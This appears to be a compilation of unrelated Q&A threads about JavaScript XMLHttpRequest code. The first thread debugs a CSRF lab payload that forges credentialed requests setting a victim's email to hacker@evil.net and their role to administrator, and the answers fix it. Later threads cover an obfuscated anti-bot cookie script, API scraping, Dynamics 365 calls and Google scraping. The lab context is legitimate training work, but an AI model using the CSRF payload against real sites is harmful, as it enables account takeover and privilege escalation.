I'm working on a CSRF lab and trying to iterate through 20+ tokens.
<script>
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.withCredentials = true;
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest.call();
};
</script>
I'm using +token[i]+ to insert the token into the csrf param, but viewing the request(s) in Burp, it seems to be "undefined":
POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0
username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=
What am I getting wrong here? I'm still new to JavaScript so maybe +token[i]+ isn't the proper way to do this?
You're defining i twice in the same scope, either define it with let or use another variable:
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.withCredentials = true;
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
for (var j = 0; j < aBody.length; j++)
aBody[j] = body.charCodeAt(j);
xhr.send(new Blob([aBody]));
}
submitRequest.call();
};
When your create the fn submitRequest() a new scope is created that doesn't know about the var token.So i think you need to pass token[i] to your fn while calling and also prototype the fn as per the requirement.
function submitRequest(token){
}
submitRequest(token[i]);
Related
The following is the request formed:
Request URL: https://remoteserverurl.docx
Request Method: GET
Status Code: 200 OK
Remote Address: 10.232.4.216:7317
Referrer Policy: no-referrer-when-downgrade
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Cookie: isPageflowTouch=true; schemaId=1; updCtx=true; typeId=91433788276151561974313054830
Host: domain.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
function getdocx(url){
var oReq = new XMLHttpRequest();
var arrayBuffer;
oReq.open('GET', url, true);
oReq.responseType = "arraybuffer";
oReq.onload = function (oEvent) {
arrayBuffer = oReq.response; // Note: not oReq.responseText
var binary = '';
var bytes = new Uint8Array( arrayBuffer );
var len = bytes.byteLength;
for (var i = 0; i < len; i++) {
binary += String.fromCharCode( bytes[ i ] );
}
var contentfromDocx = window.btoa( binary );
//do what ever you want with this
oReq.send(null);
}
i am trying to get the respawn of this api
https://www.zoomeye.org/api/search?q=facebook
but the problem is when i am trying the get it with curl it shows me this respawn header
HTTP/1.1 521
Server: nginx
Date: Thu, 09 Aug 2018 11:45:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Via-JSL: 79dfd01,-
with this javescript code in the body
<script>
var x = "length##https#####while###0xEDB88320#eval#reverse#else#Array#setTimeout#hantom##Aug##18##challenge##RegExp#363#if#GMT#Thu#PiXG#firstChild##1#href#g###document#new###8#charCodeAt#5k#join#1533815182#3D#as#return##f##addEventListener#div##pathname#split#fromCharCode#46#captcha#O#function#location#Expires#match#rOm9XFMtA3QKV7nYsPGT4lifyWwkq5vcjH2IdxUoCbhERLaz81DNB6#DOMContentLoaded###attachEvent###0#var#3#4V7#chars#catch###d###0xFF#createElement##String#try####parseInt#for#__p#cookie#e#09##window#charAt#substr#Path#toString#search##12#toLowerCase#innerHTML#2#false#36#22##JgSe0upZ##onreadystatechange######a#__jsl_clearance##replace#1500#B#".replace(/#*$/, "").split("#"),
y = "1t 2n=1h(){g('1i.y=1i.1b+1i.2e.2z(/[\\?|&]1f-n/,\\'\\')',2A);C.25='2x=11.q|1s|'+(1h(){1t 2p=[1h(2n){14 2n},1h(2p){14 2p},1h(2n){14 c('1G.1d('+2n+')')},1h(2n){23(1t 2p=1s;2p<2n.1;2p++){2n[2p]=22(2n[2p]).2d(2l)};14 2n.10('')}],2n=['1g',[(-~-~![]+[]+[])+[-~(+!{})]],'2j%',(-~-~![]+[]+[]),'2B',[(-~-~![]+[]+[])+((-~{}+[(-~-~![])*[-~-~![]]]>>-~{})+[])],[((-~{}+[(-~-~![])*[-~-~![]]]>>-~{})+[])+(~~!!29['24'+'h'+'13']+[])],[(-~-~![]+[]+[])+[(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))+(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))]],[-~(+!{})],'u',[[-~-~![]]/~~{}+[[]][1s]][1s].2a(~~{}),[(G+[[]][1s])+[(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))+(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))]],[(-~-~![]+[]+[])+(G+[[]][1s])],'I',[(-~[2j]+[]+[[]][1s])+[-~(+!{})]],'1v',[(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))+(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))]+[-~[]+(-~-~![]^-~(+!{}))]+(~~!!29['24'+'h'+'13']+[]),[[-~(+!{})]+(-~-~![]+[]+[]),(-~-~![]+[]+[])+(G+[[]][1s])],'z%12'];23(1t 1a=1s;1a<2n.1;1a++){2n[1a]=2p[[x,1u,x,1s,x,1u,2j,1u,1s,x,1s,2j,1u,x,1u,x,1s,1u,x][1a]](2n[1a])};14 2n.10('')})()+';1j=t, 27-j-l 2g:1e:2m s;2c=/;'};r((1h(){1H{14 !!29.18;}1x(26){14 2k;}})()){C.18('1m',2n,2k)}e{C.1p('2q',2n)}",
f = function(x, y) {
var a = 0,
b = 0,
c = 0;
x = x.split("");
y = y || 99;
while ((a = x.shift()) && (b = a.charCodeAt(0) - 77.5)) c = (Math.abs(b) < 13 ? (b + 48.5) : parseInt(a, 36)) + y * c;
return c
},
z = f(y.match(/\w/g).sort(function(x, y) {
return f(x) - f(y)
}).pop());
while (z++) try {
eval(y.replace(/\b\w+\b/g, function(y) {
return x[f(y, z) - 1] || ("_" + y)
}));
break
} catch (_) {}
</script>
so what i notice is this javascript code sets a cookie with name __jsl_clearance so how can i use this api in my application
any ideas or solutions
-- update this is my curl code --
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.zoomeye.org/api/search?q=facebook");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cook.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cook.txt');
curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
$headers = array();
$headers[] = "Accept-Encoding: gzip, deflate, br";
$headers[] = "Accept-Language: ar,en-US;q=0.9,en;q=0.8";
$headers[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36";
$headers[] = "Accept: application/json, text/plain, */*";
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
echo $result = curl_exec($ch);
curl_close ($ch);
thanks .....
Below is my code snippet. I am trying to fetch all the Referenced Entities from ManyToOne Relationship of Annotation entity. In the result, I am able to get the object but when I'm trying to get the length of it, its giving "undefined". Please provide your valuable suggestions on this and how can we assign the Referenced Entity to a variable from result.
OR
is there any possibility to retrieve all the entities that are associated with Annotation entity, using Web API Call ( Dynamics 365).
function fetchIt()
{
var req = new XMLHttpRequest();
var webAPICall = Xrm.Page.context.getClientUrl() + "/api/data/v8.2/EntityDefinitions(LogicalName='annotation')?$select=LogicalName&$expand=ManyToOneRelationships($select=ReferencedEntity)";
req.open("GET", webAPICall, true);
req.setRequestHeader("OData-MaxVersion", "4.0");
req.setRequestHeader("OData-Version", "4.0");
req.setRequestHeader("Accept", "application/json");
req.setRequestHeader("Content-Type", "application/json; charset=utf-8");
req.setRequestHeader("Prefer", "odata.include-annotations=\"*\"");
req.onreadystatechange = function ()
{
if (this.readyState === 4)
{
req.onreadystatechange = null;
if (this.status === 200) {
var results = JSON.parse(this.response);
alert("results.valuelength: " +results.value.length);
for (var i = 0; i < results.value.length; i++)
{
var referencedEntity = results.value[i]["ReferencedEntity"];
}
} else {
Xrm.Utility.alertDialog(this.statusText);
}
}
};
}
You have two problems
You never send your request. You're missing req.send()
It won't be results.value it will be results.ManyToOneRelationships
Then it will work
Missed a small thing there. Instead of value, to check the length, we need to use ManyToOneRelationships (results.ManyToOneRelationships.length). Thank You.
var req = new XMLHttpRequest();
var webAPICall = Xrm.Page.context.getClientUrl() + "/api/data/v8.2/EntityDefinitions(LogicalName='annotation')?$select=LogicalName&$expand=ManyToOneRelationships($select=ReferencedEntity)";
//alert(webAPICall);
req.open("GET", webAPICall, true);
req.setRequestHeader("OData-MaxVersion", "4.0");
req.setRequestHeader("OData-Version", "4.0");
req.setRequestHeader("Accept", "application/json");
req.setRequestHeader("Content-Type", "application/json; charset=utf-8");
req.setRequestHeader("Prefer", "odata.include-annotations=\"*\"");
req.onreadystatechange = function ()
{
if (this.readyState === 4)
{
req.onreadystatechange = null;
if (this.status === 200)
{
var results = JSON.parse(this.response);
alert("Results length: " + results.ManyToOneRelationships.length);
for (var i = 0; i < results.ManyToOneRelationships.length; i++)
{
var referencedEntity = results.ManyToOneRelationships[i]["ReferencedEntity"];
}
} else {
Xrm.Utility.alertDialog(this.statusText);
}
}
};
req.send();
I want to upload some files to my server with a drag'n'drop angularjs directive. I've hardcoded for hours but I haven't still found the error. I have that angularjs code:
var fd = new FormData();
for(x = 0; x < files.length; x++)
fd.append("file[]", files[x]);
fd.append('type', 'upload');
xhr = new XMLHttpRequest();
xhr.open("post", "/../RESOURCES/API/explorer.php", true);
xhr.upload.addEventListener("progress", function(e) {
var pc = parseInt(100 - (e.loaded / e.total * 100));
console.log(pc);
}, false);
xhr.onload = function() {
console.log(xhr.responseText);
};
xhr.send(fd);
But my APIs returns empty $_POST and $_FILES. Thanks!
With Angular JS, I've achieved file upload with the following code:
angular.module('frApp')
.service('fileUpload', ['$http',function ($http) {
this.uploadFileToUrl = function(file, uploadUrl, success, error){
var fd = new FormData();
fd.append('file', file);
$http.post(uploadUrl, fd, {
transformRequest: angular.identity,
headers: {'Content-Type': undefined}
}).success(success)
.error(error);
};
}]);
For my Node.Js app I need to get the first page of Google search results but from the .com domain because I need the "People also search for" knowledge graph info, which only shows up on Google.Com.
I figured I can use the request and cheerio modules to scrap content from Google's search results page, but when I try to access the URL I need, i.e. https://www.google.com/search?gws_rd=ssl&site=&source=hp&q=google&oq=google Google automatically redirects me to the .de domain (as I'm based in Germany).
I tried setting it to first load http://www.google.com/ncr url which automatically switches off country-specific redirect in browsers, but it didn't work...
Does anybody know what I could do differently to make it work?
Here's my code... Thank you!
var request = require("request");
var cheerio = require("cheerio");
function dataCookieToString(dataCookie) {
var t = "";
for (var x = 0; x < dataCookie.length; x++) {
t += ((t != "") ? "; " : "") + dataCookie[x].key + "=" + dataCookie[x].value;
}
return t;
}
function mkdataCookie(cookie) {
var t, j;
cookie = cookie.toString().replace(/,([^ ])/g, ",[12],$1").split(",[12],");
for (var x = 0; x < cookie.length; x++) {
cookie[x] = cookie[x].split("; ");
j = cookie[x][0].split("=");
t = {
key: j[0],
value: j[1]
};
for (var i = 1; i < cookie[x].length; i++) {
j = cookie[x][i].split("=");
t[j[0]] = j[1];
}
cookie[x] = t;
}
return cookie;
}
var dataCookie = mkdataCookie('MC_STORE_ID=66860; expires=' + new Date(new Date().getTime() + 86409000));
request({
uri: "https://www.google.com/ncr",
headers: {
'User-Agent': 'Mozilla/5.0',
"Cookie": dataCookieToString(dataCookie)
}
}, function(error, response, body) {
request({
uri: "https://www.google.com/search?gws_rd=ssl&site=&source=hp&q=google&oq=google",
headers: {
'User-Agent': 'Mozilla/5.0'
}
}, function(error, response, body) {
console.log(body);
var $ = cheerio.load(body);
$(".kno-fb-ctx").each(function() {
var link = $(this);
var text = link.text();
console.log(text);
});
});
});
Here's the solution: it's much easier than I thought.
However, I still have a problem that the body I get does not contain the stuff that only show up when javascript is enabled.
Anybody knows how to modify the code below so it also includes javascript-enabled content into the body?
var request = require('request');
var cheerio = require("cheerio");
request = request.defaults({jar: true});
var options = {
url: 'http://www.google.com/ncr',
headers: {
'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16'
}
};
request(options, function () {
request('https://www.google.com/search?gws_rd=ssl&site=&source=hp&q=google&oq=google', function (error, response, body) {
var $ = cheerio.load(body);
$("li").each(function() {
var link = $(this);
var text = link.text();
console.log(text);
});
});
});